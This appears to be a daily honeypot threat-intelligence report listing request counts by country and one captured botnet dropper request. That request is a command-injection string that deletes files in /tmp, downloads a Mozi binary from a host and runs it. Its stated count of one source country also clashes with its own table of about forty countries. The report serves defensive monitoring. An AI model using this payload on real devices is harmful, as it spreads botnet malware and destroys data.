Report: 2025-06-03

Author: Shoggoth Industries

Daily Report: 2025-06-03

Executive summary

Interaction report on the HTTP services of various honeypots around the world.

executive_summary

In today’s report, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 89 new requests that have never been observed before (these were added to the monitored request database).

A total of 1520 requests were recorded during the day, originating from 1 different countries, with a peak of 643 requests coming from JP.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 120.86.253.229 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.


country_iso_code

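| | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 643 | JP |
| 1 | 192 | US |
| 2 | 96 | DE |
| 3 | 92 | BG |
| 4 | 87 | GB |
| 5 | 63 | IN |
| 6 | 54 | CN |
| 7 | 52 | NL |
| 8 | 48 | HK |
| 9 | 35 | SC |
| 10 | 26 | CA |
| 11 | 24 | PL |
| 12 | 13 | CH |
| 13 | 12 | GH |
| 14 | 9 | AO |
| 15 | 8 | NG |
| 16 | 6 | PT |
| 17 | 6 | VN |
| 18 | 5 | ZA |
| 19 | 5 | TR |
| 20 | 4 | IL |
| 21 | 4 | ID |
| 22 | 3 | AZ |
| 23 | 3 | BE |
| 24 | 3 | SG |
| 25 | 3 | IR |
| 26 | 3 | KZ |
| 27 | 3 | TH |
| 28 | 2 | MD |
| 29 | 2 | KW |
| 30 | 2 | UA |
| 31 | 2 | RU |
| 32 | 2 | IE |
| 33 | 1 | CZ |
| 34 | 1 | BR |
| 35 | 1 | PA |
| 36 | 1 | TW |
| 37 | 1 | DZ |
| 38 | 1 | ES |
| 39 | 1 | KR |
| 40 | 1 | SE |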
